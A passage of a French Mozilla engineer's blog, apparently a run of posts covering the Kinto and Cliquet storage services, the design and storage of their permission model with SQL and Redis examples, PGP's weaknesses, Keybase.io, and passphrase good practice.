[1]	La bonne nouvelle c’est que toutes les fonctionnalités third-party qui ont été intégrées récemment vont redevenir des add-ons \o/.

Awesome bar

L’équipe Firefox Labs, le laboratoire qui élève des pandas roux en éprouvette, serait vraiment intéressé par notre solution, notamment pour abreuver en données un prototype pour améliorer Awesome bar, qui fusionnerait URL, historique et recherche.

Nous ne pouvons pas en dire beaucoup plus pour l’instant, mais les fonctionnalités de collections d’enregistrements partagées entre utilisateurs de Kinto correspondent parfaitement à ce qui est envisagé pour le futur du navigateur :)

À venir

Nous serons donc probablement amenés, avant de la fin de l’année, à introduire des fonctionnalités d’indexation et de recherche full-text (comprendre ElasticSearch). Cela rejoint nos plans précédents, puisque c’est quelque chose que nous avions dans Daybed, et qui figurait sur notre feuille de route !

Browser.html

L’équipe Recherche explore les notions de plateforme, et travaille notamment sur l’implémentation d’un navigateur en JS/HTML avec React: browser.html

Kinto correspond parfaitement aux attentes de l’équipe pour synchroniser les données associées à un utilisateur.

Il pourrait s’agir de données de navigation (comme Sync), mais aussi de collections d’enregistrements diverses, comme par exemple les préférences du navigateur ou un équivalent à Alexa.com Top 500 pour fournir la complétion d’URL sans interroger le moteur de recherche.

L’exercice pourrait être poussé jusqu’à la synchronisation d’états React entre périphériques (par exemple pour les onglets).

À venir

Si browser.html doit stocker des données de navigation, il faudra ajouter des fonctionnalités de chiffrement sur le client JS. Ça tombe bien, c’est un sujet passionant, et il y a plusieurs standards !

Pour éviter d’interroger le serveur à intervalle régulier afin de synchroniser les changements, l’introduction des *push notifications* semble assez naturelle. Il s’agirait alors de la dernière pierre qui manque à l’édifice pour obtenir un «Mobile/Web backend as a service» complet.

Conclusion

Nous sommes dans une situation idéale, puisque ce que nous avions imaginé sur notre feuille de route correspond à ce qui nous est demandé par les différentes équipes.

L’enjeu consiste maintenant à se coordonner avec tout le monde, ne pas décevoir, tenir la charge, continuer à améliorer et à faire la promotion du produit, se concentrer sur les prochaines étapes et embarquer quelques contributeurs à nos cotés pour construire une solution libre, générique, simple et auto-hébergeable pour le stockage de données sur le Web :)

Service de nuages : Achievement unlocked

2015-06-01T00:00:00+02:00

Cet article est repris depuis le blog « Service de Nuages » de mon équipe à Mozilla

Aujourd’hui, c’est jour de fête : nous venons de publier Cliquet 2.0 [1] et Kinto 1.0 [2].

L’aboutissement de 3 années de R&D !

—Rémy

Kinto est un service pour stocker, synchroniser et partager des données arbitraires, attachées à un compte Firefox (mais le système d’authentification est pluggable).

Cliquet est une boite à outils pour faciliter l’implémentation de micro-services HTTP tels que les APIs REST ayant des besoins de synchronisation.

Vous pouvez lire plus à propos des raisons qui nous ont poussé à proposer cette nouvelle solution et de notre ambition sur http://www.servicedenuages.fr/eco-systeme-et-stockage-generique.html

Nous sommes fiers du travail que nous avons pu réaliser durant ces derniers mois sur ces deux projets. Bien que la plupart du travail que nous ayons réalisé pour le serveur de liste de lecture (Reading List) ait pu être utilisé, beaucoup de parties ont été repensées et nous avons introduit des fonctionnalités que l’on attendait depuis longtemps, comme la gestion des permissions.

Bien sur, exactement comme après un ré-aménagement de salon, on ne peut s’empêcher de voir toutes les choses qui doivent toujours être améliorées, notamment sur la documentation et les performances.

On peut déjà entrevoir à quoi l’écosystème va ressembler, et c’est prometteur. Il y a déjà un client JavaScript [3] dont l’objectif est de synchroniser les données locales du navigateur avec une instance de Kinto.

N’hésitez vraiment pas à nous solliciter pour discuter avec vous si vous avez des problématiques proches : nous accueillons avec plaisir toutes sortes de retours, que ce soit à propos du code, de la documentation, de la sécurité de la solution ou de la manière de communiquer avec le monde extérieur. Si vous souhaitez nous contacter, vous pouvez laisser un commentaire ici ou nous contacter sur le canal #storage sur le réseau IRC de Mozilla.

Et ce n’est que le début ! Le futur se dessine dans notre feuille de route [4].

[1]	Cliquet est une boite à outils pour faciliter l’implémentation de microservices HTTP tels que les APIs REST ayant des besoins de synchronisation.

[2]	Kinto est un service pour stocker, synchroniser et partager des données arbitraires, attachées à un compte Firefox (mais le système d’authentification est pluggable).

[3]	Cliquetis, la bibliothèque JavaScript pour consommer l’API HTTP de Kinto — https://github.com/mozilla-services/cliquetis

[4]	La feuille de route de Kinto: https://github.com/mozilla-services/kinto/wiki/roadmap

Service de nuages : Stocker et interroger les permissions avec Kinto

2015-05-26T00:00:00+02:00

Cet article est repris depuis le blog « Service de Nuages » de mon équipe à Mozilla

tl;dr: On a maintenant un super système de permission mais comment faire pour stocker et interroger ces permissions de manière efficace ?

La problématique

Maintenant que nous avons défini un modèle de gestion des permissions sur les objets qui nous satisfait, le problème est de stocker ces permissions de manière efficace afin de pouvoir autoriser ou interdire l’accès à un objet pour la personne qui fait la requête.

Chaque requête sur notre API va générer une ou plusieurs demandes d’accès, il faut donc que la réponse soit très rapide sous peine d’impacter la vélocité du service.

Obtenir la liste des “principals” d’un utilisateur

Les principals de l’utilisateur correspondent à son user_id ainsi qu’à la liste des identifiants des groupes dans lesquels il a été ajouté.

Pour éviter de recalculer les principals de l’utilisateur à chaque requête, le mieux reste de maintenir une liste des principals par utilisateur.

Ainsi lorsqu’on ajoute un utilisateur à un groupe, il faut bien penser à ajouter le groupe à la liste des principals de l’utilisateur.

Ça se complexifie lorsqu’on ajoute un groupe à un groupe.

Dans un premier temps interdire l’ajout d’un groupe à un groupe est une limitation qu’on est prêts à accepter pour simplifier le modèle.

L’avantage de maintenir la liste des principals d’un utilisateur lors de la modification de cette liste c’est qu’elle est déjà construite lors des lectures, qui sont dans notre cas plus fréquentes que les écritures.

Cela nécessite de donner un identifiant unique aux groupes pour tous les buckets.

Nous proposons de de les nommer avec leur URI: /buckets/blog/groups/moderators

Obtenir la liste des “principals” d’un ACE

Rappel, un “ACE” est un Access Control Entry, un des éléments d’une ACL (e.g. modifier un enregistrement).

Avec le système de permissions choisi, les permissions d’un objet héritent de celle de l’objet parent.

Par exemple, avoir le droit d’écriture sur un bucket permet la création des permissions et la modification de tous ses records.

Ce qui veut dire que pour obtenir la liste complète des principals ayant une permission sur un objet, il faut regarder à plusieurs endroits.

Rémy a décrit dans un gist la liste d’héritage de chaque permission.

Prenons l’exemple de l’ajout d’un record dans une collection.

Le droit records:create est obtenu si l’on a l’un des droits suivants:

bucket:write
collection:write
records:create

Notre première idée était de stocker les permissions sur chaque objet et de maintenir la liste exhaustive des permissions lors d’une modification d’ACL. Cependant cela nécessitait de construire cette liste lors de l’ajout d’un objet et de mettre à jour tout l’arbre lors de sa suppression. (Je vous laisse imaginer le nombre d’opérations nécessaires pour ajouter un administrateur sur un *bucket contenant 1000 collections avec 100000 records chacune.*)

La solution que nous avons désormais adoptée consiste à stocker les principals de chaque ACE (qui a le droit de faire telle action sur l’objet), et de faire l’union des ACE hérités, afin de les croiser avec les principals de l’utilisateur :

(ACE(object, permission) ∪ inherited_ACE) ∩ PRINCIPALS(user)

Par exemple l’ACE: /buckets/blog/collections/article:records:create hérite de l’ACE /buckets/blog/collections/article:write et de /buckets/blog:write :

(ACE(/buckets/blog/collections/article:records:create) ∪ ACE(/buckets/blog/collections/article:write) ∪ ACE(/buckets/blog:write)) ∩ PRINCIPALS(‘fxa:alexis’)

Récupérer les données de l’utilisateur

La situation se corse lorsqu’on souhaite limiter la liste des records d’une collection à ceux accessibles pour l’utilisateur, car on doit faire cette intersection pour tous les records.

Une première solution est de regarder si l’utilisateur est mentionné dans les ACL*s du *bucket ou de la collection:

Ensuite, si ce n’est pas le cas, alors on filtre les records pour lesquels les principals correspondent à ceux de l’utilisateur.

principals = get_user_principals(user_id)
can_read_all = has_read_perms(bucket_id, collection_id,
                              principals)
if can_read_all:
    records = get_all_records(bucket_id, collection_id,
                              filters=[...])
else:
    records = filter_read_records(bucket_id, collection_id,
                                  principals=principals,
                                  filters=[...])

Il faudra faire quelque chose de similaire pour la suppression multiple, lorsqu’un utilisateur souhaitera supprimer des enregistrements sur lesquels il a les droits de lecture mais pas d’écriture.

Le modèle de données

Pour avoir une idée des requêtes dans un backend SQL, voyons un peu ce que donnerait le modèle de données.

Le format des ID

Utiliser des URI comme identifiant des objets présente de nombreux avantages (lisibilité, unicité, cohérence avec les URLs)

bucket: /buckets/blog
groupe: /buckets/blog/group/moderators
collection: /buckets/blog/collections/articles
record: /buckets/blog/collections/articles/records/02f3f76f-7059-4ae4-888f-2ac9824e9200

Les tables

Pour le stockage des principals et des permissions:

CREATE TABLE user(id TEXT, principals TEXT[]);
CREATE TABLE perms(ace TEXT, principals TEXT[]);

La table perms va associer des principals à chaque ACE (e.g.“/buckets/blog:write“).

Pour le stockage des données:

CREATE TABLE object(id TEXT, type TEXT, parent_id TEXT, data JSONB,
                    write_principals TEXT[], read_principals TEXT[]);

La colonne parent_id permet de savoir à qui appartient l’objet (e.g. groupe d’un bucket, collection d’un bucket, record d’une collection, …).

Exemple d’utilisateur

INSERT INTO user (id, principals)
     VALUES ('fxa:alexis', '{}');

INSERT INTO user (id, principals)
     VALUES ('fxa:natim',
             '{"/buckets/blog/groups/moderators"}');

Exemple d’objets

Bucket

INSERT INTO object (id, type, parent_id, data,
                    read_principals, write_principals)
VALUES (
    '/buckets/blog',
    'bucket',
    NULL,
    '{"name": "blog"}'::JSONB,
    '{}', '{"fxa:alexis"}');

Group

INSERT INTO object (id, type, parent_id, data,
                    read_principals, write_principals)
VALUES (
    '/buckets/blog/groups/moderators',
    'group',
    '/buckets/blog',
    '{"name": "moderators", "members": ['fxa:natim']}'::JSONB,
    '{}', '{}');

Ce groupe peut être gére par fxa:alexis puisqu’il a la permission write dans le bucket parent.

Collection

INSERT INTO object (id, type, parent_id, data,
                    read_principals, write_principals)
VALUES (
    '/buckets/blog/collections/articles',
    'collection',
    '/buckets/blog',
    '{"name": "article"}'::JSONB,
    '{"system.Everyone"}',
    '{"/buckets/blog/groups/moderators"}');

Cette collection d’articles peut être lue par tout le monde, et gérée par les membres du groupe moderators, ainsi que fxa:alexis, via le bucket.

Records

INSERT INTO object (id, type, parent_id, data,
                    read_principals, write_principals)
VALUES (
    '/buckets/blog/collections/articles/records/02f3f76f-7059-4ae4-888f-2ac9824e9200',
    'record',
    '/buckets/blog/collections/articles',
    '{"name": "02f3f76f-7059-4ae4-888f-2ac9824e9200",
      "title": "Stocker les permissions", ...}'::JSONB,
    '{}', '{}');

Interroger les permissions

Obtenir la liste des “principals” d’un ACE

Comme vu plus haut, pour vérifier une permission, on fait l’union des principals requis par les objets hérités, et on teste leur intersection avec ceux de l’utilisateur:

WITH required_principals AS (
     SELECT unnest(principals) AS p
       FROM perms
      WHERE ace IN (
         '/buckets/blog:write',
         '/buckets/blog:read',
         '/buckets/blog/collections/article:write',
         '/buckets/blog/collections/article:read')
 ),
 user_principals AS (
     SELECT unnest(principals)
       FROM user
      WHERE id = 'fxa:natim'
 )
 SELECT COUNT(*)
   FROM user_principals a
  INNER JOIN required_principals b
     ON a.p = b.p;

Filtrer les objets en fonction des permissions

Pour filtrer les objets, on fait une simple intersection de liste (merci PostgreSQL):

SELECT data
  FROM object o, user u
 WHERE o.type = 'record'
   AND o.parent_id = '/buckets/blog/collections/article'
   AND (o.read_principals && u.principals OR
        o.write_principals && u.principals)
   AND u.id = 'fxa:natim';

Les listes s’indexent bien, notamment grâce aux index GIN.

Avec Redis

Redis présente plusieurs avantages pour ce genre de problématiques. Notamment, il gère les set nativement (listes de valeurs uniques), ainsi que les opérations d’intersection et d’union.

Avec Redis on peut écrire l’obtention des principals pour un ACE comme cela :

SUNIONSTORE temp_perm:/buckets/blog/collections/articles:write  permission:/buckets/blog:write  permission:/buckets/blog/collections/articles:write
SINTER temp_perm:/buckets/blog/collections/articles:write principals:fxa:alexis

SUNIONSTORE permet de créer un set contenant les éléments de l’union de tous les set suivants. Dans notre cas on le nomme temp_perm:/buckets/blog/collections/articles:write et il contient l’union des sets d’ACLs suivants: - permission:/buckets/blog:write - permission:/buckets/blog/collections/articles:write
SINTER retourne l’intersection de tous les sets passés en paramètres dans notre cas : - temp_perm:/buckets/blog/collections/articles:write - principals:fxa:alexis

Plus d’informations sur : - http://redis.io/commands/sinter - http://redis.io/commands/sunionstore

Si le set résultant de la commande SINTER n’est pas vide, alors l’utilisateur possède la permission.

On peut ensuite supprimer la clé temporaire temp_perm.

En utilisant MULTI on peut même faire tout cela au sein d’une transaction et garantir ainsi l’intégrité de la requête.

Conclusion

La solution a l’air simple mais nous a demandé beaucoup de réflexion en passant par plusieurs propositions.

L’idée finale est d’avoir :

Un backend spécifique permettant de stocker les principals des utilisateurs et des ACE (e.g. avec les sets Redis) ;
La liste des principals read et write sur la table des objets.

C’est dommage d’avoir le concept de permissions à deux endroits, mais cela permet de connaître rapidement la permission d’un utilisateur sur un objet et également de pouvoir récupérer tous les objets d’une collection pour un utilisateur si celui-ci n’a pas accès à tous les records de la collection, ou toutes les collections du bucket.

Les problèmes de PGP

2015-05-25T00:00:00+02:00

Flip a bit in the communication between sender and recipient and they will experience decryption or verification errors. How high are the chances they will start to exchange the data in the clear rather than trying to hunt down the man in the middle?

— http://secushare.org/PGP

Une fois passé l’euphorie du “il faut utiliser PGP pour l’ensemble de nos communications”, j’ai réalisé lors de discussions que PGP avait plusieurs problèmes, parmi ceux-ci:

Les meta données (y compris le champ “sujet” de la conversation) sont quand même échangées en clair (il est possible de savoir qu’un message à été échangé entre telle et telle personne, a telle date);
PGP se base sur un protocole de communication qui est lui non chiffré, et il est donc facile de soit se tromper, soit dégrader le mode de conversation vers une méthode non chiffrée;
Il est facile de connaître votre réseau social avec PGP, puisque tout le principe est de signer les clés des personnes dont vous validez l’identité;
En cas de fuite de votre clé privée, tous les messages que vous avez chiffrés avec elle sont compromis. On dit que PGP ne fournit pas de forward secrecy;
La découverte de la clé de pairs se passe souvent en clair, sans utiliser une connexion “sécurisée” (HTTPS). Tout le monde peut donc voir ces échanges et savoir de qui vous cherchez la clé;
Les discussions de groupes sont très difficiles: il faut chiffrer pour chacun des destinataires (ou que ceux-ci partagent une paire de clés).

Je suis en train de creuser à propos les alternatives à PGP, par exemple Pond, qui lui ne construit pas par dessus un standard déjà établi, et donc n’hérite pas de ses défauts (mais pas non plus de son réseau déjà établi).

En attendant, quelques bonnes pratiques sur PGP ;)

Bonnes pratiques

Il est en fait assez facile d’utiliser PGP de travers. Riseup à fait un excellent guide qui explique comment configurer son installation correctement.

J’en ai déjà parlé, mais il faut absolument choisir des phrases de passes suffisamment longues. Pas facile de les retenir, mais indispensable. Vous pouvez aussi avoir un document chiffré avec une clé que vous ne mettez jamais en ligne, qui contiens ces phrases de passe, au cas ou vous les oubliez.
Générez des clés RSA de 4096 bits, en utilisant sha512;
Il faut utiliser une date d’expiration de nos clés suffisamment proche (2 ans). Il est possible de repousser cette date si nécessaire, par la suite.

Parmi les choses les plus frappantes que j’ai rencontrées:

Utiliser le flag –hidden-recipient avec PGP pour ne pas dévoiler qui est le destinataire du message;
Ne pas envoyer les messages de brouillons sur votre serveur, ils le seraient en clair !;
Utilisez HPKS pour communiquer avec les serveurs de clés, sinon tout le trafic est en clair.

Le projet Bitmask vise lui à rendre les outils de chiffrement d’échanges de messages et de VPN simples à utiliser, encore quelque chose à regarder.

Enfin bref, y’a du taf.

Simplifier les preuves d’identités

2015-05-11T00:00:00+02:00

headline
Qu’est-ce que Keybase.io et comment essayent-ils de simplifier la création de preuves d’identité.

L’un des problèmes non réellement résolu actuellement quant au chiffrement des échanges est lié à l’authenticité des clés. Si quelqu’un décide de publier une clé en mon nom, et en utilisant mon adresse email, cela lui est assez facile.

Il est donc nécessaire d’avoir des moyens de prouver que la clé publique que j’utilise est réellement la mienne.

Traditionnellement, il est nécessaire de faire signer ma clé publique par d’autres personnes, via une rencontre en personne ou des échanges hors du réseau. C’est par exemple ce qui est réalisé lors des Key Signing parties.

Une manière simple d’effectuer ces vérifications serait, en plus de donner son adresse email, sa signature de clé, ou a minima de donner un mot clé pour valider que les échanges proviennent bien de la bonne personne.

PGP propose un mécanisme de signature des clés d’autrui, une fois celles ci validées, ce qui permet de placer sa confiance dans les signataires de la clé.

Keybase.io est un service qui vise à rendre la création de ces preuves plus facile, en partant du principe qu’il est possible d’utiliser différents moyens afin de prouver l’identité des personnes. Par exemple, leurs comptes Twitter, GitHub ou leurs noms de domaines. De la même manière qu’il est possible de signer (valider) les clés de nos amis, il est possible de les “tracker” selon le jargon de keybase.

Donc, en somme, Keybase.io est un annuaire, qui tente de rendre plus facile la création de preuves. Bien.

Quelques points d’ombre

Il s’agit d’une startup américaine, domiciliée dans le Delaware, qui se trouve être un des paradis fiscaux qui est connu pour être un paradis fiscal au coeur même des États-Unis. Je ne veux pas faire de raccourcis trop rapides, bien évidemment, alors j’ai ouvert un ticket sur GitHub pour en savoir plus (après tout, le fait d’être un paradis fiscal permet peut-être d’échapper à certaines lois sur la requêtes de données). D’autant plus étonnant, la startup n’a pour l’instant pas de business model (ce qui en un sens est assez rassurant, même si on peut se poser la question de pourquoi faire une startup dans ces cas là).

Le service (bien qu’en Alpha), n’est pas mis à disposition sous licence libre, ce qui pour l’instant empêche quiconque de créer son propre serveur Keybase. Une partie des composants, cependant, le sont (open source).

J’ai du mal à croire en des initiatives qui veulent sauver le monde, mais dans leur coin, je ne comprends pas pourquoi il n’y à pas de documentation sur comment monter son propre serveur, ou comment les aider à travailler sur la fédération. Mais bon, c’est pour l’instant une initiative encore fraîche, et je lui laisse le bénéfice du doute.

Sur le long terme, une infrastructure comme Keybase.io, devra évidemment être distribuée.

We’ve been talking about a total decentralization, but we have to solve a couple things, synchronization in particular. Right now someone can mirror us and a client can trust a mirror just as easily as the server at keybase.io, but there needs to be a way of announcing proofs to any server and having them cooperate with each other. We’d be so happy to get this right.

— Chris Coyne, co-founder of Keybase

Afin de se “passer” de leur service centralisé, les preuves générées (qui sont la force du système qu’ils mettent en place) pourraient être exportées sur des serveurs de clés existants. C’est quelque chose qu’ils souhaitent réaliser ..

Bref, une initiative quand même importante et utile, même si elle soulève des questions qui méritent qu’on s’y attarde un brin.

Par ailleurs, d’autres projets qui visent des objectifs similaires existent, via le projet LEAP, mais je n’ai pas encore creusé.

Phrases de passe et bonnes pratiques

2015-05-09T00:00:00+02:00

headline
Communiquer de manière chiffrée n’est pas aisée, et nécessite de mémoriser des phrases de passes complexes. Comment s’en sortir ?

Au contraire des autres mots de passe, les mots de passe cryptographiques ont specifiquement besoin d’être longs et extremement difficiles à deviner. La raison est qu’un ordinateur (ou un cluster de plusieurs ordinateurs) peut être programmé pour faire des trillions d’essais de manière automatique. Si le mot de passe choisi est trop faible ou construit d’une manière trop prédictible, cette attaque par la force pourrait se revéler fructueuse en essayant toutes les possibilités.

— The Electronic Frontier Foundation (traduction de mon fait)

Comprendre les concepts et l’écosystème qui permettent d’avoir une vie numérique chiffrée n’est pas quelque chose d’aisé. Plusieurs guides ont été écrits à ce propos, et pour autant je me rends compte que naïvement il est possible de mal utiliser les outils existants.

Utilisez un bon mot de passe pour votre session utilisateur et une bonne phrase de passe pour proteger votre clé privée. Cette phrase de passe est la partie la plus fragile de tout le système.

— La page de manuel de GPG.

Une phrase de passe devrait:

Être suffisamment longue pour être difficile à deviner;
Ne pas être une citation connue (littérature, livres sacrés etc);
Difficile à deviner même pour vos proches;
Facile à se souvenir et à taper;
être unique et non partagée entre différents sites / applications etc.

Une des techniques consiste à utiliser des mots du dictionnaire, sélectionnés de manière aléatoire, puis modifiés.

Micah Lee travaille également sur un outil qui vise à rendre la mémorisation des phrases de passe plus aisée, de par leur répétition avec des pauses de plus en plus longues.

Oui, ce n’est pas aussi simple que ce qu’il y parait. Pour ma part, j’ai une copie en local de mes clés, dans un fichier chiffré avec une autre clé que j’ai généré pour l’occasion et que je ne partagerait pas. J’ai par ailleurs configuré mon éditeur de texte pour pouvoir chiffrer les documents textes par défaut.

J’ai donc regénéré une nouvelle fois mes clés de travail et personnelles, en utilisant des phrases de passe plus complexes.

Reste encore la question de la sauvegarde de ces clés privées de manière chiffrée, que je n’ai pas encore résolue. Bref, tout cela me semble bien compliqué pour réussir à l’expliquer à des novices, qui pour certains ne sont même pas sur de l’intérêt de la chose.

Service de nuages : La gestion des permissions

2015-05-01T00:00:00+02:00

Cet article est repris depuis le blog « Service de Nuages » de mon équipe à Mozilla

Dans le cadre de la création d’un service de stockage de données personnelles (Kinto), la gestion des permissions est un des gros challenges : qui doit avoir accès à quoi, et comment le définir ?

tl;dr: Quelques retours sur le vocabulaire des systèmes de permission et sur nos idées pour l’implementation des permissions dans un stockage générique.

La problématique

La problématique est simple : des données sont stockées en ligne, et il faut un moyen de pouvoir les partager avec d’autres personnes.

En regardant les cas d’utilisations, on se rend compte qu’on a plusieurs types d’utilisateurs :

les utilisateurs “finaux” (vous) ;
les applications qui interagissent en leurs noms.

Tous les intervenants n’ont donc pas les mêmes droits : certains doivent pouvoir lire, d’autres écrire, d’autres encore créer de nouveaux enregistrements, et le contrôle doit pouvoir s’effectuer de manière fine : il doit être possible de lire un enregistrement mais pas un autre, par exemple.

Nous sommes partis du constat que les solutions disponibles n’apportaient pas une réponse satisfaisante à ces besoins.

Un problème de vocabulaire

Le principal problème rencontré lors des réflexions fût le vocabulaire.

Voici ci-dessous une explication des différents termes.

Le concept de « principal »

Un principal, en sécurité informatique, est une entité qui peut être authentifiée par un système informatique. [1] En Français il s’agit du « commettant », l’acteur qui commet l’action (oui, le terme est conceptuel !)

Il peut s’agir aussi bien d’un individu, d’un ordinateur, d’un service ou d’un groupe regroupant l’une de ces entités, ce qui est plus large que le classique « user id ».

Les permissions sont alors associées à ces principals.

Par exemple, un utilisateur est identifié de manière unique lors de la connexion par le système d’authentification dont le rôle est de définir une liste de principals pour l’utilisateur se connectant.

[1]	Pour en savoir plus sur les principals : https://en.wikipedia.org/wiki/Principal_%28computer_security%29

La différence entre rôle et groupe

De but en blanc, il n’est pas évident de définir précisément la différence entre ces deux concepts qui permettent d’associer des permissions à un groupe de principals. [2]

La différence est principalement sémantique. Mais on peut y voir une différence dans la « direction » de la relation entre les deux concepts.

Un rôle est une liste de permissions que l’on associe à un principal.
Un groupe est une liste de principals que l’on peut associer à une permission.

[2]	Plus d’informations : http://stackoverflow.com/questions/7770728/group-vs-role-any-real-difference

La différence entre permission, ACL, ACE

Une ACL est une liste d’Access Control Entry (ACE) ou entrée de contrôle d’accès donnant ou supprimant des droits d’accès à une personne ou un groupe.

—https://fr.wikipedia.org/wiki/Access_Control_List

Je dirais même plus, dans notre cas, « à un principal ». Par exemple:

create_record: alexis,remy,tarek

Cet ACE donne la permission create sur l’objet record aux utilisateurs Tarek, Rémy et Alexis.

La délégation de permissions

Imaginez l’exemple suivant, où un utilisateur stocke deux types de données en ligne :

des contacts ;
une liste de tâches à faire qu’il peut associer à ses contacts.

L’utilisateur a tous les droits sur ses données.

Cependant il utilise deux applications qui doivent elles avoir un accès restreint :

une application de gestion des contacts à qui il souhaite déléguer la gestion intégrale de ses contacts : contacts:write ;
une application de gestion des tâches à qui il souhaite déléguer la gestion des tâches : contacts:read tasks:write

Il souhaite que son application de contacts ne puisse pas accéder à ses tâches et que son application de tâches ne puisse pas modifier ses contacts existants, juste éventuellement en créer de nouveaux.

Il lui faut donc un moyen de déléguer certains de ses droits à un tiers (l’application).

C’est précisément le rôle des scopes OAuth2.

Lors de la connexion d’un utilisateur, une fenêtre lui demande quels accès il veut donner à l’application qui va agir en son nom.

Le service aura ensuite accès à ces scopes en regardant le jeton d’authentification utilisé. Cette information doit être considérée comme une entrée utilisateur (c’est à dire qu’on ne peut pas lui faire confiance). Il s’agit de ce que l’utilisateur souhaite.

Or, il est également possible que l’utilisateur n’ait pas accès aux données qu’il demande. Le service doit donc utiliser deux niveaux de permissions : celles de l’utilisateur, et celles qui ont été déléguées à l’application.

Espace de noms

Dans notre implémentation initiale de Kinto (notre service de stockage en construction), l’espace de nom était implicite : les données stockées étaient nécessairement celles de l’utilisateur connecté.

Les données d’un utilisateur étaient donc cloisonnées et impossible à partager.

L’utilisation d’espaces de noms est une manière simple de gérer le partage des données.

Nous avons choisi de reprendre le modèle de GitHub et de Bitbucket, qui utilisent les « organisations » comme espaces de noms.

Dans notre cas, il est possible de créer des “buckets”, qui correspondent à ces espaces de noms. Un bucket est un conteneur de collections et de groupes utilisateurs.

Les ACLs sur ces collections peuvent être attribuées à certains groupes du bucket ainsi qu’à d’autres principals directement.

Notre proposition d’API

Les objets manipulés

Pour mettre en place la gestion des permissions, nous avons identifié les objets suivants :

Objet	Description
bucket	On peut les voir comme des espaces de noms. Ils permettent d’avoir différentes collections portant le même nom mais stockées dans différents buckets de manière à ce que les données soient distinctes.
collection	Une liste d’enregistrements.
record	Un enregistrement d’une collection.
group	Un groupe de commetants (« principals »).

Pour la définition des ACLs, il y a une hiérarchie et les objets « héritent » des ACLs de leur parents :

           +---------------+
           | Bucket        |
           +---------------+
    +----->+ - id          +<---+
    |      | - permissions |    |
    |      +---------------+    |
    |                           |
    |                           |
    |                           |
    |                           |
    |                           |
+---+-----------+        +------+---------+
| Collection    |        | Group          |
+---------------+        +----------------+
| - id          |        |  - id          |
| - permissions |        |  - members     |
+------+--------+        |  - permissions |
       ^                 +----------------+
       |
       |
+------+---------+
| Record         |
+----------------+
|  - id          |
|  - data        |
|  - permissions |
+----------------+

Les permissions

Pour chacun de ces objets nous avons identifié les permissions suivantes :

Permission	Description
read	La permission de lire le contenu de l’objet et de ses sous-objets.
write	La permission de modifier et d’administrer un objet et ses sous- objets. La permission write permet la lecture, modification et suppression d’un objet ainsi que la gestion de ses permissions.
create	La permission de créer le sous-objet spécifié. Par exemple: `collections:create`

À chaque permission spécifiée sur un objet est associée une liste de principals.

Dans le cas de la permission create on est obligé de spécifier l’objet enfant en question car un objet peut avoir plusieurs types d’enfants. Par exemple : collections:create, groups:create.

Nous n’avons pour l’instant pas de permission pour delete et update, puisque nous n’avons pas trouvé de cas d’utilisation qui les nécessitent. Quiconque avec le droit d’écriture peut donc supprimer un enregistrement.

Les permissions d’un objet sont héritées de son parent. Par exemple, un enregistrement créé dans une collection accessible à tout le monde en lecture sera lui aussi accessible à tout le monde.

Par conséquent, les permissions sont cumulées. Autrement dit, il n’est pas possible qu’un objet ait des permissions plus restrictives que son parent.

Voici la liste exhaustive des permissions :

Objet	Permissions associées	Commentaire
Configuration (.ini)	buckets:create	Les principals ayant le droit de créer un bucket sont définis dans la configuration du serveur. (ex. utilisateurs authentifiés)
`bucket`	write	C’est en quelque sorte le droit d’administration du bucket.
	read	C’est le droit de lire le contenu de tous les objets du bucket.
	collections:create	Permission de créer des collections dans le bucket.
	groups:create	Permission de créer des groupes dans le bucket.
`collection`	write	Permission d’administrer tous les objets de la collection.
	read	Permission de consulter tous les objets de la collection.
	records:create	Permission de créer des nouveaux enregistrement dans la collection.
`record`	write	Permission de modifier ou de partager l’enregistrement.
`record`	read	Permission de consulter l’enregistrement.
`group`	write	Permission d’administrer le groupe
`group`	read	Permission de consulter les membres du groupe.

Les « principals »

Les acteurs se connectant au service de stockage peuvent s’authentifier.

Ils reçoivent alors une liste de principals :

Everyone: le principal donné à tous les acteurs (authentifiés ou pas) ;
Authenticated: le principal donné à tous les acteurs authentifiés ;
un principal identifiant l’acteur, par exemple fxa:32aa95a474c984d41d395e2d0b614aa2

Afin d’éviter les collisions d’identifiants, le principal de l’acteur dépend de son type d’authentification (system, basic, ipaddr, hawk, fxa) et de son identifiant (unique par acteur).

En fonction du bucket sur lequel se passe l’action, les groupes dont fait partie l’utilisateur sont également ajoutés à sa liste de principals. group:moderators par exemple.

Ainsi, si Bob se connecte avec Firefox Accounts sur le bucket servicedenuages_blog dans lequel il fait partie du groupe moderators, il aura la liste de principals suivante : Everyone, Authenticated, fxa:32aa95a474c984d41d395e2d0b614aa2, group:moderators

Il est donc possible d’assigner une permission à Bob en utilisant l’un de ces quatre principals.

Note

Le principal <userid> dépend du back-end d’authentification (e.g. github:leplatrem).

Quelques exemples

Blog

Objet	Permissions	Principals
`bucket:blog`	`write`	`fxa:<blog owner id>`
`collection:articles`	`write`	`group:moderators`
`collection:articles`	`read`	`Everyone`
`record:569e28r98889`	`write`	`fxa:<co-author id>`

Wiki

Object	Permissions	Principals
`bucket:wiki`	`write`	`fxa:<wiki administrator id>`
`collection:articles`	`write`	`Authenticated`
`collection:articles`	`read`	`Everyone`

Sondages

Objet	Permissions	Principals
`bucket:poll`	`write`	`fxa:<admin id>`
`bucket:poll`	`collection:create`	`Authenticated`
`collection:<poll id>`	`write`	`fxa:<poll author id>`
`collection:<poll id>`	`record:create`	`Everyone`

Cartes colaboratives

Objet	Permissions	Principals
`bucket:maps`	`write`	`fxa:<admin id>`
`bucket:maps`	`collection:create`	`Authenticated`
`collection:<map id>`	`write`	`fxa:<map author id>`
`collection:<map id>`	`read`	`Everyone`
`record:<record id>`	`write`	`fxa:<maintainer id>` (ex. event staff member maintaining venues)

Plateformes

Bien sûr, il y a plusieurs façons de modéliser les cas d’utilisation typiques. Par exemple, on peut imaginer une plateforme de wikis (à la wikia.com), où les wikis sont privés par défaut et certaines pages peuvent être rendues publiques :

Objet	Permissions	Principals
`bucket:freewiki`	`write`	`fxa:<administrator id>`
	`collection:create`	`Authenticated`
	`group:create`	`Authenticated`
`collection:<wiki id>`	`write`	`fxa:<wiki owner id>`, `group:<editors id>`
`collection:<wiki id>`	`read`	`group:<readers id>`
`record:<page id>`	`read`	`Everyone`

L’API HTTP

Lors de la création d’un objet, l’utilisateur se voit attribué la permission write sur l’objet :

PUT /v1/buckets/servicedenuages_blog HTTP/1.1
Authorization: Bearer 0b9c2625dc21ef05f6ad4ddf47c5f203837aa32ca42fced54c2625dc21efac32
Accept: application/json

HTTP/1.1 201 Created
Content-Type: application/json; charset=utf-8

{
    "id": "servicedenuages_blog",
    "permissions": {
